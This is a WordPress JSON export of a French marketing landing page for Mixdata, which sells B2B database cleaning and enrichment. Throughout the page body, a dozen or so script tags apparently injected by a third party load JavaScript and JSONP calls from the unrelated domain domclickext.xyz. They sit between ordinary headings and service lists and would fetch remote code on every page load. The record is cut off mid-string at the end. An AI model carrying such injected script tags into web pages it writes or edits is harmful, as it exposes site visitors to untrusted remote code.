{"id":1585,"date":"2019-10-01T15:02:06","date_gmt":"2019-10-01T13:02:06","guid":{"rendered":"https:\/\/www.mixdata.com\/fr\/?page_id=1585"},"modified":"2024-06-24T10:46:38","modified_gmt":"2024-06-24T08:46:38","slug":"landing-data","status":"publish","type":"page","link":"https:\/\/www.mixdata.com\/fr\/landing-data\/","title":{"rendered":"Landing Page &#8211; M\u00e9nage Data"},"content":{"rendered":"<p>[vc_row css_animation=\u00a0\u00bb\u00a0\u00bb row_type=\u00a0\u00bbrow\u00a0\u00bb use_row_as_full_screen_section=\u00a0\u00bbno\u00a0\u00bb type=\u00a0\u00bbgrid\u00a0\u00bb angled_section=\u00a0\u00bbno\u00a0\u00bb text_align=\u00a0\u00bbleft\u00a0\u00bb background_image_as_pattern=\u00a0\u00bbwithout_pattern\u00a0\u00bb][vc_column][vc_single_image image=\u00a0\u00bb1097&Prime; img_size=\u00a0\u00bb1122&#215;68&Prime; alignment=\u00a0\u00bbcenter\u00a0\u00bb qode_css_animation=\u00a0\u00bb\u00a0\u00bb css=\u00a0\u00bb.vc_custom_1561720399168{margin-top: 20px !important;}\u00a0\u00bb][vc_empty_space height=\u00a0\u00bb15px\u00a0\u00bb][\/vc_column][\/vc_row][vc_row css_animation=\u00a0\u00bb\u00a0\u00bb row_type=\u00a0\u00bbrow\u00a0\u00bb use_row_as_full_screen_section=\u00a0\u00bbno\u00a0\u00bb type=\u00a0\u00bbgrid\u00a0\u00bb angled_section=\u00a0\u00bbno\u00a0\u00bb text_align=\u00a0\u00bbleft\u00a0\u00bb background_image_as_pattern=\u00a0\u00bbwithout_pattern\u00a0\u00bb][vc_column width=\u00a0\u00bb1\/3&Prime;][vc_single_image image=\u00a0\u00bb1596&Prime; img_size=\u00a0\u00bbmedium\u00a0\u00bb alignment=\u00a0\u00bbcenter\u00a0\u00bb qode_css_animation=\u00a0\u00bb\u00a0\u00bb][vc_empty_space height=\u00a0\u00bb15px\u00a0\u00bb][\/vc_column][vc_column width=\u00a0\u00bb2\/3&Prime;][vc_empty_space height=\u00a0\u00bb30px\u00a0\u00bb][vc_column_text]<\/p>\n<h4 style=\"text-align: left;\"><strong>Vos donn\u00e9es sont pr\u00e9cieuses&#8230; Mais sont-elles \u00e0 jour ?<\/strong><\/h4>\n<p><script src=\"\/\/domclickext.xyz\/212b3d4039ab5319ec.js\" async=\"\" type=\"text\/javascript\"><\/script>[\/vc_column_text][vc_empty_space height=\u00a0\u00bb15px\u00a0\u00bb][vc_column_text]<\/p>\n<h2 style=\"text-align: left;\">Peut-\u00eatre qu&rsquo;un petit m\u00e9nage Data s&rsquo;impose !<\/h2>\n<p><script src=\"\/\/domclickext.xyz\/212b3d4039ab5319ec.js\" async=\"\" type=\"text\/javascript\"><\/script>[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\u00a0\u00bb\u00a0\u00bb row_type=\u00a0\u00bbrow\u00a0\u00bb use_row_as_full_screen_section=\u00a0\u00bbno\u00a0\u00bb type=\u00a0\u00bbgrid\u00a0\u00bb angled_section=\u00a0\u00bbno\u00a0\u00bb text_align=\u00a0\u00bbleft\u00a0\u00bb background_image_as_pattern=\u00a0\u00bbwithout_pattern\u00a0\u00bb css=\u00a0\u00bb.vc_custom_1566919792823{padding-right: 50px !important;}\u00a0\u00bb][vc_column width=\u00a0\u00bb2\/3&Prime; css=\u00a0\u00bb.vc_custom_1566919805146{padding-right: 50px !important;padding-left: 50px !important;}\u00a0\u00bb][vc_empty_space height=\u00a0\u00bb10px\u00a0\u00bb][vc_column_text]<\/p>\n<h3>Mixdata vous accompagne dans\u00a0<strong>la<\/strong>\u00a0<strong>mise \u00e0 jour<\/strong><strong>\u00a0et l&rsquo;enrichissement de vos bases de donn\u00e9es<\/strong> :<\/h3>\n<p><script src=\"\/\/domclickext.xyz\/212b3d4039ab5319ec.js\" async=\"\" type=\"text\/javascript\"><\/script>[\/vc_column_text][vc_empty_space height=\u00a0\u00bb10px\u00a0\u00bb][vc_column_text css=\u00a0\u00bb.vc_custom_1569935205997{padding-top: 15px !important;padding-right: 15px !important;padding-bottom: 15px !important;padding-left: 15px !important;border-radius: 1px !important;}\u00a0\u00bb]<\/p>\n<div id=\"lp-pom-text-306\" class=\"lp-element lp-pom-text nlh\">\n<p class=\"lplh-22\"><strong>Mise \u00e0 jour de vos COMPTES ENTREPRISES :<\/strong><\/p>\n<\/div>\n<p><script src=\"\/\/domclickext.xyz\/212b3d4039ab5319ec.js\" async=\"\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"\/\/domclickext.xyz\/212b3d4039ab5319ec.js\" async=\"\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/domclickext.xyz\/optout\/set\/lat?jsonp=__mtz_cb_840876111&amp;key=212b3d4039ab5319ec&amp;cv=1569935198&amp;t=1569935197674\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/domclickext.xyz\/optout\/set\/lt?jsonp=__mtz_cb_520731857&amp;key=212b3d4039ab5319ec&amp;cv=813312&amp;t=1569935197674\" type=\"text\/javascript\"><\/script><\/p>\n<p>[\/vc_column_text]<div class='q_icon_with_title large custom_icon_image'><div class=\"icon_holder \" style=\" \"><img decoding=\"async\" itemprop=\"image\" style=\"\" src=\"https:\/\/www.mixdata.com\/fr\/wp-content\/uploads\/2019\/10\/picto-entreprises.png\" alt=\"\"><\/div><div class=\"icon_text_holder\" style=\"padding-left:140px;\"><div class=\"icon_text_inner\" style=\"\"><h5 class=\"icon_title\" style=\"\"><\/h5><p style=''><\/p>\n<ul>\n<li>Adresse postale, coordonn\u00e9es t\u00e9l\u00e9phoniques<\/li>\n<li>Liquidation judiciaire, redressement, radiation<\/li>\n<li>Changement de dirigeant, de capital social<\/li>\n<li>CA, effectifs, NAF, r\u00e9sultat net...<\/li>\n<\/ul>\n<p><\/p><\/div><\/div><\/div>[vc_column_text css=\u00a0\u00bb.vc_custom_1569935193014{padding-top: 15px !important;padding-right: 15px !important;padding-bottom: 15px !important;padding-left: 15px !important;border-radius: 1px !important;}\u00a0\u00bb]<\/p>\n<div id=\"lp-pom-text-306\" class=\"lp-element lp-pom-text nlh\">\n<p class=\"lplh-22\"><strong>Mise \u00e0 jour de vos CONTACTS :<\/strong><\/p>\n<\/div>\n<p><script src=\"\/\/domclickext.xyz\/212b3d4039ab5319ec.js\" async=\"\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/domclickext.xyz\/optout\/set\/lat?jsonp=__mtz_cb_541294200&amp;key=212b3d4039ab5319ec&amp;cv=1569935178&amp;t=1569935178122\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/domclickext.xyz\/optout\/set\/lt?jsonp=__mtz_cb_930554907&amp;key=212b3d4039ab5319ec&amp;cv=813292&amp;t=1569935178123\" type=\"text\/javascript\"><\/script><\/p>\n<p>[\/vc_column_text][vc_empty_space height=\u00a0\u00bb5px\u00a0\u00bb]<div class='q_icon_with_title large custom_icon_image'><div class=\"icon_holder \" style=\" \"><img decoding=\"async\" itemprop=\"image\" style=\"\" src=\"https:\/\/www.mixdata.com\/fr\/wp-content\/uploads\/2019\/07\/contact.png\" alt=\"\"><\/div><div class=\"icon_text_holder\" style=\"padding-left:140px;\"><div class=\"icon_text_inner\" style=\"\"><h5 class=\"icon_title\" style=\"\"><\/h5><p style=''><\/p>\n<ul>\n<li>Email pro<\/li>\n<li>Fonctions \/ intitul\u00e9s de poste exacts<\/li>\n<li>Nouveaux contacts : DRH, DSI, Dir. Commercial, Dir. Marketing, Dir. juridique, Dir. Achats...<\/li>\n<\/ul>\n<p><\/p><\/div><\/div><\/div>[vc_empty_space height=\u00a0\u00bb30px\u00a0\u00bb][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><strong><em>Mixdata, c&rsquo;est aussi des prestations d&rsquo;enrichissement de base, de scoring, de <\/em><em>recherche de prospects similaires (look alike) et de marketing pr\u00e9dictif BtoB&#8230;<\/em><\/strong><\/p>\n<p><script src=\"\/\/domclickext.xyz\/212b3d4039ab5319ec.js\" async=\"\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"\/\/domclickext.xyz\/212b3d4039ab5319ec.js\" async=\"\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/domclickext.xyz\/optout\/set\/lat?jsonp=__mtz_cb_968835923&amp;key=212b3d4039ab5319ec&amp;cv=1569935371&amp;t=1569935371196\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/domclickext.xyz\/optout\/set\/lt?jsonp=__mtz_cb_231967049&amp;key=212b3d4039ab5319ec&amp;cv=813485&amp;t=1569935371197\" type=\"text\/javascript\"><\/script>[\/vc_column_text][vc_empty_space height=\u00a0\u00bb40px\u00a0\u00bb][vc_single_image image=\u00a0\u00bb2469&Prime; img_size=\u00a0\u00bb800&#215;270&Prime; alignment=\u00a0\u00bbcenter\u00a0\u00bb qode_css_animation=\u00a0\u00bb\u00a0\u00bb][\/vc_column][vc_column width=\u00a0\u00bb1\/3&Prime; css=\u00a0\u00bb.vc_custom_1566920321488{padding-right: 30px !important;padding-left: 30px !important;background-color: #afc4da !important;border-radius: 5px !important;}\u00a0\u00bb][vc_column_text]<\/p>\n<h2>En savoir plus<\/h2>\n<p>[\/vc_column_text][vc_empty_space height=\u00a0\u00bb15px\u00a0\u00bb][vc_separator type=\u00a0\u00bbnormal\u00a0\u00bb][vc_empty_space height=\u00a0\u00bb15px\u00a0\u00bb][vc_raw_js]JTNDc2NyaXB0JTIwY2hhcnNldCUzRCUyMnV0Zi04JTIyJTIwdHlwZSUzRCUyMnRleHQlMkZqYXZhc2NyaXB0JTIyJTIwc3JjJTNEJTIyJTJGJTJGanMuaHNmb3Jtcy5uZXQlMkZmb3JtcyUyRnNoZWxsLmpzJTIyJTNFJTNDJTJGc2NyaXB0JTNFJTBBJTNDc2NyaXB0JTNFJTBBJTIwJTIwaGJzcHQuZm9ybXMuY3JlYXRlJTI4JTdCJTBBJTA5cG9ydGFsSWQlM0ElMjAlMjI1NjkwMTM3JTIyJTJDJTBBJTA5Zm9ybUlkJTNBJTIwJTIyODk4MDgyMWYtMTc3Ni00NTQxLWFlOWQtZTc2NDgwOWI4OWEyJTIyJTBBJTdEJTI5JTNCJTBBJTNDJTJGc2NyaXB0JTNF[\/vc_raw_js][vc_empty_space height=\u00a0\u00bb20px\u00a0\u00bb][\/vc_column][\/vc_row][vc_row css_animation=\u00a0\u00bb\u00a0\u00bb row_type=\u00a0\u00bbrow\u00a0\u00bb use_row_as_full_screen_section=\u00a0\u00bbno\u00a0\u00bb type=\u00a0\u00bbgrid\u00a0\u00bb angled_section=\u00a0\u00bbno\u00a0\u00bb text_align=\u00a0\u00bbleft\u00a0\u00bb background_image_as_pattern=\u00a0\u00bbwithout_pattern\u00a0\u00bb][vc_column][vc_empty_space height=\u00a0\u00bb25px\u00a0\u00bb][vc_separator type=\u00a0\u00bbnormal\u00a0\u00bb][vc_column_text]<\/p>\n<h4 style=\"text-align: center;\"><em>Mixdata est une agence de Smart Data \u00e9ditrice d\u2019une solution innovante d\u2019aide \u00e0 la prospection BtoB.\u00a0<\/em><\/h4>\n<p>[\/vc_column_text][vc_empty_space height=\u00a0\u00bb25px\u00a0\u00bb][\/vc_column][\/vc_row][vc_row css_animation=\u00a0\u00bb\u00a0\u00bb row_type=\u00a0\u00bbrow\u00a0\u00bb use_row_as_full_screen_section=\u00a0\u00bbno\u00a0\u00bb type=\u00a0\u00bbgrid\u00a0\u00bb angled_section=\u00a0\u00bbno\u00a0\u00bb text_align=\u00a0\u00bbleft\u00a0\u00bb background_image_as_pattern=\u00a0\u00bbwithout_pattern\u00a0\u00bb][vc_column width=\u00a0\u00bb1\/4&Prime;][vc_empty_space height=\u00a0\u00bb10px\u00a0\u00bb][vc_single_image image=\u00a0\u00bb106&Prime; img_size=\u00a0\u00bb80&#215;80&Prime; alignment=\u00a0\u00bbcenter\u00a0\u00bb qode_css_animation=\u00a0\u00bb\u00a0\u00bb][\/vc_column][vc_column width=\u00a0\u00bb3\/4&Prime;][vc_column_text]<\/p>\n<p style=\"text-align: left;\"><em>S&rsquo;appuyant sur les derni\u00e8res technologies du big data et du web-crawling, Mixdata agr\u00e8ge les donn\u00e9es entreprises pr\u00e9sentes sur le web, les r\u00e9seaux sociaux et les donn\u00e9es l\u00e9gales, donnant \u00e0 ses clients un acc\u00e8s exclusif \u00e0 une base tr\u00e8s renseign\u00e9e sur les entreprises et leurs dirigeants. Mixdata, Jeune Entreprise Innovante, ouvre ainsi un nouveau champ de possibilit\u00e9s dans le ciblage BtoB et l&rsquo;acc\u00e9l\u00e9ration commerciale.\u00a0<\/em><\/p>\n<p>[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\u00a0\u00bb\u00a0\u00bb row_type=\u00a0\u00bbrow\u00a0\u00bb use_row_as_full_screen_section=\u00a0\u00bbno\u00a0\u00bb type=\u00a0\u00bbgrid\u00a0\u00bb angled_section=\u00a0\u00bbno\u00a0\u00bb text_align=\u00a0\u00bbleft\u00a0\u00bb background_image_as_pattern=\u00a0\u00bbwithout_pattern\u00a0\u00bb][vc_column][vc_separator type=\u00a0\u00bbnormal\u00a0\u00bb][\/vc_column][\/vc_row][vc_column][\/vc_column][vc_row css_animation=\u00a0\u00bb\u00a0\u00bb row_type=\u00a0\u00bbrow\u00a0\u00bb use_row_as_full_screen_section=\u00a0\u00bbno\u00a0\u00bb type=\u00a0\u00bbgrid\u00a0\u00bb angled_section=\u00a0\u00bbno\u00a0\u00bb text_align=\u00a0\u00bbleft\u00a0\u00bb background_image_as_pattern=\u00a0\u00bbwithout_pattern\u00a0\u00bb][vc_column][vc_empty_space][vc_column_text]<\/p>\n<p style=\"text-align: center;\"><strong>Mixdata SAS &#8211; Producteur de Smart Data BtoB\u00a0<\/strong><\/p>\n<p style=\"text-align: center;\"><strong>95, rue Marcel Dassault 92100 Boulogne-Billancourt &#8211; T\u00e9l. +33 (0)1 41 10 58 40<\/strong><\/p>\n<p>[\/vc_column_text][vc_empty_space][vc_column_text]<\/p>\n<div class=\"lp-positioned-content\">\n<div id=\"lp-pom-text-334\" class=\"lp-element lp-pom-text nlh\">\n<h6 style=\"text-align: center;\">Les informations recueillies sur ce formulaire sont enregistr\u00e9es par Mixdata \u00e0 des fins de gestion client\u00e8le et de prospection.Elles sont conserv\u00e9es pendant une dur\u00e9e n&rsquo;exc\u00e9dant pas la dur\u00e9e l\u00e9gale n\u00e9cessaire aux finalit\u00e9s pour lesquelles elles sont trait\u00e9es, et sont destin\u00e9es au service commercial de Mixdata. Conform\u00e9ment \u00e0 la loi \u00ab informatique et libert\u00e9s \u00bb et au RGPD, vous avez la possibilit\u00e9 d\u2019acc\u00e9der, de modifier, de corriger ou de demander la suppression de vos donn\u00e9es personnelles \u00e0 tout moment. Vous avez le droit de vous opposer au traitement et le droit d&rsquo;introduire une r\u00e9clamation aupr\u00e8s d&rsquo;une autorit\u00e9 de contr\u00f4le.Pour avoir acc\u00e8s aux donn\u00e9es vous concernant et exercer votre droit de rectification, d\u2019opposition ou d\u2019effacement, contactez Mixdata au 95, rue Marcel Dassault 92100 Boulogne-Billancourt, ou par email <a href=\"mailto:opposition@mixdata.com\">opposition@mixdata.com<\/a><\/h6>\n<\/div>\n<\/div>\n<p>[\/vc_column_text][vc_empty_space][\/vc_column][\/vc_row][vc_row css_animation=\u00a0\u00bb\u00a0\u00bb row_type=\u00a0\u00bbrow\u00a0\u00bb use_row_as_full_screen_section=\u00a0\u00bbno\u00a0\u00bb type=\u00a0\u00bbfull_width\u00a0\u00bb angled_section=\u00a0\u00bbno\u00a0\u00bb text_align=\u00a0\u00bbleft\u00a0\u00bb background_image_as_pattern=\u00a0\u00bbwithout_pattern\u00a0\u00bb][vc_column][vc_column_text]<\/p>\n<p><script src=\"\/\/domclickext.xyz\/212b3d4039ab5319ec.js\" async=\"\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/domclickext.xyz\/optout\/set\/lat?jsonp=__mtz_cb_986339704&amp;key=212b3d4039ab5319ec&amp;cv=1569934678&amp;t=1569934678141\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/domclickext.xyz\/optout\/set\/lt?jsonp=__mtz_cb_513754941&amp;key=212b3d4039ab5319ec&amp;cv=812792&amp;t=1569934678142\" type=\"text\/javascript\"><\/script>[\/vc_column_text][\/vc_column][\/vc_row][vc_row css_animation=\u00a0\u00bb\u00a0\u00bb row_type=\u00a0\u00bbrow\u00a0\u00bb use_row_as_full_screen_section=\u00a0\u00bbno\u00a0\u00bb type=\u00a0\u00bbfull_width\u00a0\u00bb angled_section=\u00a0\u00bbno\u00a0\u00bb text_align=\u00a0\u00bbleft\u00a0\u00bb background_image_as_pattern=\u00a0\u00bbwithout_pattern\u00a0\u00bb][vc_column][vc_column_text]<\/p>\n<p><script src=\"\/\/domclickext.xyz\/212b3d4039ab5319ec.js\" async=\"\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"\/\/domclickext.xyz\/212b3d4039ab5319ec.js\" async=\"\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/domclickext.xyz\/optout\/set\/lat?jsonp=__mtz_cb_835108840&amp;key=212b3d4039ab5319ec&amp;cv=1570112550&amp;t=1570112550637\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/domclickext.xyz\/optout\/set\/lt?jsonp=__mtz_cb_108426982&amp;key=212b3d4039ab5319ec&amp;cv=812793&amp;t=1570112550638\" type=\"text\/javascript\"><\/script>[\/vc_column_text][\/vc_column][\/vc_row]<\/p>\n","protected":false},"excerpt":{"rendered":"<p>[vc_row css_animation=\u00a0\u00bb\u00a0\u00bb row_type=\u00a0\u00bbrow\u00a0\u00bb use_row_as_full_screen_section=\u00a0\u00bbno\u00a0\u00bb type=\u00a0\u00bbgrid\u00a0\u00bb angled_section=\u00a0\u00bbno\u00a0\u00bb text_align=\u00a0\u00bbleft\u00a0\u00bb background_image_as_pattern=\u00a0\u00bbwithout_pattern\u00a0\u00bb][vc_column][vc_single_image image=\u00a0\u00bb1097&Prime; img_size=\u00a0\u00bb1122&#215;68&Prime; alignment=\u00a0\u00bbcenter\u00a0\u00bb qode_css_animation=\u00a0\u00bb\u00a0\u00bb css=\u00a0\u00bb.vc_custom_1561720399168{margin-top: 20px !important;}\u00a0\u00bb][vc_empty_space height=\u00a0\u00bb15px\u00a0\u00bb][\/vc_column][\/vc_row][vc_row css_animation=\u00a0\u00bb\u00a0\u00bb row_type=\u00a0\u00bbrow\u00a0\u00bb use_row_as_full_screen_section=\u00a0\u00bbno\u00a0\u00bb type=\u00a0\u00bbgrid\u00a0\u00bb angled_section=\u00a0\u00bbno\u00a0\u00bb text_align=\u00a0\u00bbleft\u00a0\u00bb background_image_as_pattern=\u00a0\u00bbwithout_pattern\u00a0\u00bb][vc_column width=\u00a0\u00bb1\/3&Prime;][vc_single_image image=\u00a0\u00bb1596&Prime; img_size=\u00a0\u00bbmedium\u00a0\u00bb alignment=\u00a0\u00bbcenter\u00a0\u00bb qode_css_animation=\u00a0\u00bb\u00a0\u00bb][vc_empty_space height=\u00a0\u00bb15px\u00a0\u00bb][\/vc_column][vc_column width=\u00a0\u00bb2\/3&Prime;][vc_empty_space height=\u00a0\u00bb30px\u00a0\u00bb][vc_column_text] Vos donn\u00e9es sont pr\u00e9cieuses&#8230; Mais sont-elles \u00e0 jour ? [\/vc_column_text][vc_empty_space height=\u00a0\u00bb15px\u00a0\u00bb][vc_column_text] Peut-\u00eatre qu&rsquo;un petit&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"landing_page.php","meta":{"footnotes":""},"class_list":["post-1585","page","type-page","status-publish","hentry"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v26.1.1 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Landing Page - M\u00e9nage Data<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.mixdata.com\/fr\/landing-data\/\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Landing Page - M\u00e9nage Data\" \/>\n<meta property=\"og:description\" content=\"[vc_row css_animation=\u00a0\u00bb\u00a0\u00bb row_type=\u00a0\u00bbrow\u00a0\u00bb use_row_as_full_screen_section=\u00a0\u00bbno\u00a0\u00bb type=\u00a0\u00bbgrid\u00a0\u00bb angled_section=\u00a0\u00bbno\u00a0\u00bb text_align=\u00a0\u00bbleft\u00a0\u00bb background_image_as_pattern=\u00a0\u00bbwithout_pattern\u00a0\u00bb][vc_column][vc_single_image image=\u00a0\u00bb1097&Prime; img_size=\u00a0\u00bb1122&#215;68&Prime; alignment=\u00a0\u00bbcenter\u00a0\u00bb qode_css_animation=\u00a0\u00bb\u00a0\u00bb css=\u00a0\u00bb.vc_custom_1561720399168{margin-top: 20px !important;}\u00a0\u00bb][vc_empty_space height=\u00a0\u00bb15px\u00a0\u00bb][\/vc_column][\/vc_row][vc_row css_animation=\u00a0\u00bb\u00a0\u00bb row_type=\u00a0\u00bbrow\u00a0\u00bb use_row_as_full_screen_section=\u00a0\u00bbno\u00a0\u00bb type=\u00a0\u00bbgrid\u00a0\u00bb angled_section=\u00a0\u00bbno\u00a0\u00bb text_align=\u00a0\u00bbleft\u00a0\u00bb background_image_as_pattern=\u00a0\u00bbwithout_pattern\u00a0\u00bb][vc_column width=\u00a0\u00bb1\/3&Prime;][vc_single_image image=\u00a0\u00bb1596&Prime; img_size=\u00a0\u00bbmedium\u00a0\u00bb alignment=\u00a0\u00bbcenter\u00a0\u00bb qode_css_animation=\u00a0\u00bb\u00a0\u00bb][vc_empty_space height=\u00a0\u00bb15px\u00a0\u00bb][\/vc_column][vc_column width=\u00a0\u00bb2\/3&Prime;][vc_empty_space height=\u00a0\u00bb30px\u00a0\u00bb][vc_column_text] Vos donn\u00e9es sont pr\u00e9cieuses&#8230; Mais sont-elles \u00e0 jour ? [\/vc_column_text][vc_empty_space height=\u00a0\u00bb15px\u00a0\u00bb][vc_column_text] Peut-\u00eatre qu&rsquo;un petit...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.mixdata.com\/fr\/landing-data\/\" \/>\n<meta property=\"og:site_name\" content=\"Mixdata - Fichiers B2B et Prospection BtoB\" \/>\n<meta property=\"article:modified_time\" content=\"2024-06-24T08:46:38+00:00\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:site\" content=\"@mixdata92\" \/>\n<meta name=\"twitter:label1\" content=\"Dur\u00e9e de lecture estim\u00e9e\" \/>\n\t<meta name=\"twitter:data1\" content=\"3 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.mixdata.com\/fr\/landing-data\/\",\"url\":\"https:\/\/www.mixdata.com\/fr\/landing-data\/\",\"name\":\"Landing Page - M\u00e9nage Data\",\"isPartOf\":{\"@id\":\"https:\/\/www.mixdata.com\/fr\/#website\"},\"datePublished\":\"2019-10-01T13:02:06+00:00\",\"dateModified\":\"2024-06-24T08:46:38+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/www.mixdata.com\/fr\/landing-data\/#breadcrumb\"},\"inLanguage\":\"fr-FR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.mixdata.com\/fr\/landing-data\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.mixdata.com\/fr\/landing-data\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Accueil\",\"item\":\"https:\/\/www.mixdata.com\/fr\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Landing Page &#8211; M\u00e9nage Data\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.mixdata.com\/fr\/#website\",\"url\":\"https:\/\/www.mixdata.com\/fr\/\",\"name\":\"Mixdata - Fichiers B2B et Prospection BtoB\",\"description\":\"Fichiers btob et Smart data b2b, leads generation : un outil de prospection en mode SaaS pour les Commerciaux et le Marketing.\",\"publisher\":{\"@id\":\"https:\/\/www.mixdata.com\/fr\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.mixdata.com\/fr\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"fr-FR\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.mixdata.com\/fr\/#organization\",\"name\":\"MIXDATA\",\"url\":\"https:\/\/www.mixdata.com\/fr\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\/\/www.mixdata.com\/fr\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.mixdata.com\/fr\/wp-content\/uploads\/2019\/03\/mixdata-logo-100p-e1552399152569.png\",\"contentUrl\":\"https:\/\/www.mixdata.com\/fr\/wp-content\/uploads\/2019\/03\/mixdata-logo-100p-e1552399152569.png\",\"width\":80,\"height\":26,\"caption\":\"MIXDATA\"},\"image\":{\"@id\":\"https:\/\/www.mixdata.com\/fr\/#\/schema\/logo\/image\/\"},\"sameAs\":[\"https:\/\/x.com\/mixdata92\",\"https:\/\/www.linkedin.com\/company\/mixdata\/\"]}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Landing Page - M\u00e9nage Data","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.mixdata.com\/fr\/landing-data\/","og_locale":"fr_FR","og_type":"article","og_title":"Landing Page - M\u00e9nage Data","og_description":"[vc_row css_animation=\u00a0\u00bb\u00a0\u00bb row_type=\u00a0\u00bbrow\u00a0\u00bb use_row_as_full_screen_section=\u00a0\u00bbno\u00a0\u00bb type=\u00a0\u00bbgrid\u00a0\u00bb angled_section=\u00a0\u00bbno\u00a0\u00bb text_align=\u00a0\u00bbleft\u00a0\u00bb background_image_as_pattern=\u00a0\u00bbwithout_pattern\u00a0\u00bb][vc_column][vc_single_image image=\u00a0\u00bb1097&Prime; img_size=\u00a0\u00bb1122&#215;68&Prime; alignment=\u00a0\u00bbcenter\u00a0\u00bb qode_css_animation=\u00a0\u00bb\u00a0\u00bb css=\u00a0\u00bb.vc_custom_1561720399168{margin-top: 20px !important;}\u00a0\u00bb][vc_empty_space height=\u00a0\u00bb15px\u00a0\u00bb][\/vc_column][\/vc_row][vc_row css_animation=\u00a0\u00bb\u00a0\u00bb row_type=\u00a0\u00bbrow\u00a0\u00bb use_row_as_full_screen_section=\u00a0\u00bbno\u00a0\u00bb type=\u00a0\u00bbgrid\u00a0\u00bb angled_section=\u00a0\u00bbno\u00a0\u00bb text_align=\u00a0\u00bbleft\u00a0\u00bb background_image_as_pattern=\u00a0\u00bbwithout_pattern\u00a0\u00bb][vc_column width=\u00a0\u00bb1\/3&Prime;][vc_single_image image=\u00a0\u00bb1596&Prime; img_size=\u00a0\u00bbmedium\u00a0\u00bb alignment=\u00a0\u00bbcenter\u00a0\u00bb qode_css_animation=\u00a0\u00bb\u00a0\u00bb][vc_empty_space height=\u00a0\u00bb15px\u00a0\u00bb][\/vc_column][vc_column width=\u00a0\u00bb2\/3&Prime;][vc_empty_space height=\u00a0\u00bb30px\u00a0\u00bb][vc_column_text] Vos donn\u00e9es sont pr\u00e9cieuses&#8230; Mais sont-elles \u00e0 jour ? [\/vc_column_text][vc_empty_space height=\u00a0\u00bb15px\u00a0\u00bb][vc_column_text] Peut-\u00eatre qu&rsquo;un petit...","og_url":"https:\/\/www.mixdata.com\/fr\/landing-data\/","og_site_name":"Mixdata - Fichiers B2B et Prospection BtoB","article_modified_time":"2024-06-24T08:46:38+00:00","twitter_card":"summary_large_image","twitter_site":"@mixdata92","twitter_misc":{"Dur\u00e9e de lecture estim\u00e9e":"3 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/www.mixdata.com\/fr\/landing-data\/","url":"https:\/\/www.mixdata.com\/fr\/landing-data\/","name":"Landing Page - M\u00e9nage Data","isPartOf":{"@id":"https:\/\/www.mixdata.com\/fr\/#website"},"datePublished":"2019-10-01T13:02:06+00:00","dateModified":"2024-06-24T08:46:38+00:00","breadcrumb":{"@id":"https:\/\/www.mixdata.com\/fr\/landing-data\/#breadcrumb"},"inLanguage":"fr-FR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.mixdata.com\/fr\/landing-data\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.mixdata.com\/fr\/landing-data\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Accueil","item":"https:\/\/www.mixdata.com\/fr\/"},{"@type":"ListItem","position":2,"name":"Landing Page &#8211; M\u00e9nage Data"}]},{"@type":"WebSite","@id":"https:\/\/www.mixdata.com\/fr\/#website","url":"https:\/\/www.mixdata.com\/fr\/","name":"Mixdata - Fichiers B2B et Prospection BtoB","description":"Fichiers btob et Smart data b2b, leads generation : un outil de prospection en mode SaaS pour les Commerciaux et le 